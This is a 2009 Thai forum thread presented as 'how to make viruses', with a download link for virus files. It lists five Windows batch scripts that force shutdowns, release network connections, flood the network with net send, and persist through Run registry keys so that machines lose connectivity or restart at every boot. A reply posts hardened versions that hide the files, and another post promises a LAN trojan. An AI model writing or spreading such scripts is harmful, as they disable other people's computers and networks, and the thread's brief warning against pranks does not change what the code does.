Webboard

มุมถาม-ตอบ ปัญหาการใช้งานคอมพิวเตอร์ => Tips & Trick Computer => Topic started by: PokPak MaTem on 18 August 2009, 17:08:32

Title: ความรู้ทั่วไปเกี่ยวกับไวรัสครับ และวิธีทำเป็น ตัวอย่างง่ายๆ!!! (ด้านมืด)
Post by: PokPak MaTem on 18 August 2009, 17:08:32
เพื่อนมันทำก็เลยจัดการเอามาซะเลย อิอิ เอาไปดูครับ มีตัวอย่างไวรัส และวิธีทำ ดูในนั้นเลย

ส่วนไฟล์มันนั้นจะเป็นไฟล์ไวรัสโดยไม่ผ่านการ Autorun นะ เอาไปศึกษาดู สบายใจ แต่ถ้าคลิ๊กเอง ไม่รับรอง [emo12] [emo11]

http://sv1.uploadfile.biz/get.php?file=269682214529



ข้างในนะ วิธีอย่างย่อ
Quote
--ระดับไม่ค่อยรุนแรง--

ไวรัส #1 กดแล้ว ปิดเครื่อง
ตัวนี้ไม่มีไรมาก แค่ดับเบิลคลิกมัน เครื่องก็ ชัตดาวน์ทันที ไม่ทำลายข้อมูลใด ๆ ทั้งสิ้น

Code:
@echo off
TITLE Mr_Unlocker
shutdown -r -f -t 0

ไวรัส # 2 ตัดการเชื่อมต่ออินเตอร์เน็ต/เน็ตเวิร์ก
อันนี้แรงขึ้นมาหน่อย จะตัดการทำงานของอินเตอร์เน็ตชั่วขณะ
Code:
@echo off
TITLE Mr_Unlocker
ipconfig /release



Virus#3 Combo Virus
ตัวนี้จะมีความต่อเนื่องจากสองตัวข้างบน คือ เมื่อคลิกแล้ว จะทำ flood network และการทำงานจะวน loop จนเน็ตเวิร์กเดี้ยง

Code:
@echo off
TITLE Mr_Unlocker :CRASH
net send * WORKGROUP ENABLED
net send * WORKGROUP ENABLED
GOTO CRASH
--ระดับรุนแรง ( มาก )--

Virus#4 Disble IP Address
โดนตัวนี้เข้าไปก็อย่าหวังเลยว่าจะเข้าอินเตอร์เน็ตไ ด้อีก

Code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Unlocker Hackers Strike Again
PAUSE



Virus#5 สั่งปิดเครื่องทุกๆครั้งที่เปิดจนถึง11วินาที (เปิดแล้วก็ปิดอยู่อย่างนั้น)

code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE

---------------------------------------


Title: Re: ความรู้ทั่วไปเกี่ยวกับไวรัสครับ และวิธีทำเป็น ตัวอย่างง่ายๆ!!! (ด้านมืด)
Post by: microsoft on 19 August 2009, 00:36:03
ง่ะ กำ แล้วใครจะลองล่ะครับ เขียนได้ก็ขอวิธีแก้ด้วยก็ดีนะครับ เผื่อใครเอาไปลองแล้วหาวิธีแก้ไม่ได้ มีหวังฟอร์แมตลงใหม่ลูกเดียวเลย แต่ก็ขอเก็บไว้ศึกษาหน่อยนะครับ  [emo03]  [emo05]

ขอบคุณมากครับท่าน  [emo22]  [emo22]
Title: Re: ความรู้ทั่วไปเกี่ยวกับไวรัสครับ และวิธีทำเป็น ตัวอย่างง่ายๆ!!! (ด้านมืด)
Post by: PokPak MaTem on 19 August 2009, 16:01:49
เพื่อนมันทำ สงสัยต้องถามเพื่อนมันก่อน

เห็นมันว่า มันสร้าง Trojan วงแลน เองได้แล้วด้วย เพิ่งเสร็จยังไม่สมบูรณ์นัก แต่เด๋วจะเอามาครับ
น่าจะได้ใกล้ๆนี้ ส่งทาง PM นะครับ


มันเป็น Mod ของ www.ov3rsky.com แน่ะ  [emo13]
ชื่อว่า ThanaSoft หาได้ไม่ยาก เด่นเลย  [emo13]
Title: Re: ความรู้ทั่วไปเกี่ยวกับไวรัสครับ และวิธีทำเป็น ตัวอย่างง่ายๆ!!! (ด้านมืด)
Post by: fantasy ಠ-ಠ on 20 August 2009, 22:07:51
เป็นการเล่นคำสั่ง กับ Batch ล้วน ๆ

อันแรกก็น่าใช้สำหรับคอมฯที่ปิดเครื่องช้า
แต่คิดว่ากด Power ทีนึง จะปิดเร็วกว่าอ่ะ [emo01]

อันสอง เป็นการใช้คำสั่ง ipconfig เพื่อขอไอพีใหม่ ใช้บ่อย

อันสาม ถ้าเครื่องอยู่ในกลุ่มชื่อ workgroup ซึ่งก็เป็นซะส่วนใหญ่
แต่ถ้าอยู่บนโดเมน หรือว่าชื่อกลุ่มเปลี่ยนไปเป็นชื่ออื่น ก็ไม่มีอันตราย
วิธีจะทำให้เดือดร้อนกว่านี้ น่าจะเป็น

Quote
Code :
@echo off
TITLE Mr_Unlocker
:CRASH
net send * * ENABLED
net send * * ENABLED
GOTO CRASH

[emo06]

อันสี่ จะเป็นการเล่น คำสั่งบน Batch แต่ไปเพิ่มใน Registry
วิธีการนี้ จะแก้ได้ก็ต้องหาแผ่น PE มาแก้ไข Registry ให้ได้ก่อน
ไม่ก็แค่ลบไฟล์ wimn32.bat ... ว่าแต่ว่า ถ้าใช้คำสั่งเปลี่ยนชื่อไฟล์เพิ่มลงไปอีกนิด จะทำให้แก้ไขได้ยากขึ้นอีก [emo13] งานเข้านะเนี่ย [emo12]

Quote
Code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\wimn32.bat
echo break off>>c:\windows\wimn32.bat
echo ipconfig/release_all>>c:\windows\wimn32.bat
echo end>>c:\windows\wimn32.bat
attrib +s +h +r c:\windows\wimn32.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
echo Unlocker Hackers Strike Again
PAUSE

อันห้า
จะบอกว่าคล้าย ๆ อันหนึ่ง มาประยุกต์รวมกับอันสี่

Quote
code:
@echo off
break off
TITLE Unlocker Hackers
echo @echo off>c:\windows\hartlell.bat
echo break off>>c:\windows\hartlell.bat
echo shutdown -r -t 11 -f>>c:\windows\hartlell.bat
echo end>>c:\windows\hartlell.bat
attrib +s +h +r c:\windows\hartlell.bat
reg add hkey_local_machine\software\microsoft\windows\curr entversion\run /v startAPI /t reg_sz /d c:\windows\hartlell.bat /f
reg add hkey_current_user\software\microsoft\windows\curre ntversion\run /v HAHAHA /t reg_sz /d c:\windows\hartlell.bat /f
echo Unlocker Hackers Strike Again
PAUSE

ยังไงก็อย่าได้ไปเอาไปแกล้งคนอื่น ๆ เลยนะ มันไม่ดีน่ะ [emo11]
รู้ไว้ ใช้ศึกษา
เล่นเอง พังเอง แก้ไขปัญหาเอง จะดีกว่าไปทำคนอื่นเดือดร้อน [emo01]

งานจะเข้าไหมเนี่ย เข้ามาแ้ก้ข้อผิดพลาดให้น่ะ
Title: Re: ความรู้ทั่วไปเกี่ยวกับไวรัสครับ และวิธีทำเป็น ตัวอย่างง่ายๆ!!! (ด้านมืด)
Post by: PokPak MaTem on 21 August 2009, 17:05:01
555 [emo03]

อิอิ สุดๆจิงๆ
Title: Re: ความรู้ทั่วไปเกี่ยวกับไวรัสครับ และวิธีทำเป็น ตัวอย่างง่ายๆ!!! (ด้านมืด)
Post by: Narin_Bank on 23 August 2009, 20:43:43
ขอบคุณครับ